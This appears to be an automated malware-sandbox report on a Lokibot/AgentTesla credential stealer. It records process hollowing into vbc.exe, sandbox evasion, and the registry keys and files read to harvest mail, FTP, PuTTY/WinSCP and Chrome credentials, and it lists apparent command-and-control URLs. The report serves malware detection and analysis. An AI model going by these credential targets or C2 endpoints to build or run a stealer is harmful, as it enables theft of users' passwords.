Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Code function: 1_2_00007FFC08DD30B1
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Code function: 1_2_00007FFC08DD0250
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Code function: 1_2_00007FFC08DD35AA
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Code function: 1_2_00007FFC08DD58F1 NtUnmapViewOfSection
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.277880213.0000000001239000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.277988455.00000000014B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameYYb0Ep2I7EwTtTvva.exe4 vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameadderalldll.dll8 vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Virustotal: Detection: 63%
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Metadefender: Detection: 54%
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | File read: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe "C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe"
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@4/2
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

          Data Obfuscation:

          Yara detected aPLib compressed binary
          Source: Yara match File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe PID: 6996, type: MEMORYSTR
          .NET source code contains potential unpacker
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.d70000.0.unpack, _.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.d70000.0.unpack, _.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Code function: 1_2_00007FFC08DD0F31 push eax; retf 1_2_00007FFC08DD0F32
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp Binary or memory string: ASWHOOKX
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp Binary or memory string: ASWHOOKA
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe TID: 7084 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe TID: 7152 Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Process information queried: ProcessInformation
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278048512.0000000002EA0000.00000004.00020000.sdmp Binary or memory string: uBFFvKFzltaAsyykWAFWeOKaApmuqNPlSbQdICqyklKKDYRGRbTabhJKzJiMMfLRJgWIVsmZaLinubJQEgkVcxVanRXdbfWMtdXMvMCiEhlepfUmRDiHDBCkMYSTtjcdALlFAJZIVRW
          Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 415000
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 41A000
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 4A0000
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 2DE008
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe Queries volume information: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Lokibot
          Source: Yara match; File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe PID: 6996, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara match; File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 411 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 111 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | Credentials in Registry 1 | Process Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Application Layer Protocol 112 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 411 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | System Information Discovery 13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | 63% | Virustotal |
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | 54% | Metadefender |
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | 100% | Avira | TR/Dropper.Gen2
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.0.vbc.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          4.0.vbc.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          publicspeaking.co.id | 9% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
          http://publicspeaking.co.id/seun/Panel/five/fre.php | 6% | Virustotal |
          http://publicspeaking.co.id/seun/Panel/five/fre.php | 0% | Avira URL Cloud | safe
          http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
          http://www.publicspeaking.co.id/seun/Panel/five/fre.php | 0% | Avira URL Cloud | safe
          https://publicspeaking.co.id/seun/Panel/five/fre.php | 0% | Avira URL Cloud | safe
          http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
          http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          publicspeaking.co.id | 216.239.36.21 | true | false | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
          http://publicspeaking.co.id/seun/Panel/five/fre.php | false | 6% Virustotal; Avira URL Cloud: safe | unknown
          http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.publicspeaking.co.id/seun/Panel/five/fre.php | vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
          https://publicspeaking.co.id/seun/Panel/five/fre.php | vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
          http://www.ibsensoftware.com/ | FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          216.239.34.21 | unknown | United States | 15169 | GOOGLEUS | false
          216.239.36.21 | publicspeaking.co.id | United States | 15169 | GOOGLEUS | false

          General Information

          Joe Sandbox Version: 34.0.0 Boulder Opal
          Analysis ID: 525634
          Start date: 20.11.2021
          Start time: 21:36:09
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 4m 30s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed: 25
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.spyw.evad.winEXE@3/3@4/2
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 1.1% (good quality ratio 1.1%)
          • Quality average: 61.5%
          • Quality standard deviation: 24.5%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 9
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
          • Not all processes were analyzed; the report is missing behavior information
          • Report size getting too big; too many NtQueryValueKey calls found

          Simulations

          Behavior and APIs

          Time | Type | Description
          21:37:05 | API Interceptor | 2x Sleep call for process: vbc.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.log
          Process: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          File Type: ASCII text, with CRLF line terminators
          Category: dropped
          Size (bytes): 1088
          Entropy (8bit): 5.389592652326326
          Encrypted: false
          SSDEEP: 24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKh6+84xpNT:MxHKn1qHGiD0HKeGiYHKGD8Ao6+vxpNT
          MD5: 4ADB7AB90D6BE2824A5986B25E8CA850
          SHA1: EFA4C824556AFEB86529C4DC162216B114496BE9
          SHA-256: BD9D15C568A8B94720AEDD9259908090E4FFC8961F8EDBF075011C61A3CB39C0
          SHA-512: 4B0D4E57DC7EB02AEA99640611B0D11251ADD370A0A053E6481B4931ABF62C161EEAEB526FCC371A5F84898EB1C3F290C7BFDCB6CA50733F434C4E23EA833C81
          Malicious: true
          Reputation: moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
          Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          File Type: very short file (no magic)
          Category: dropped
          Size (bytes): 1
          Entropy (8bit): 0.0
          Encrypted: false
          SSDEEP: 3:U:U
          MD5: C4CA4238A0B923820DCC509A6F75849B
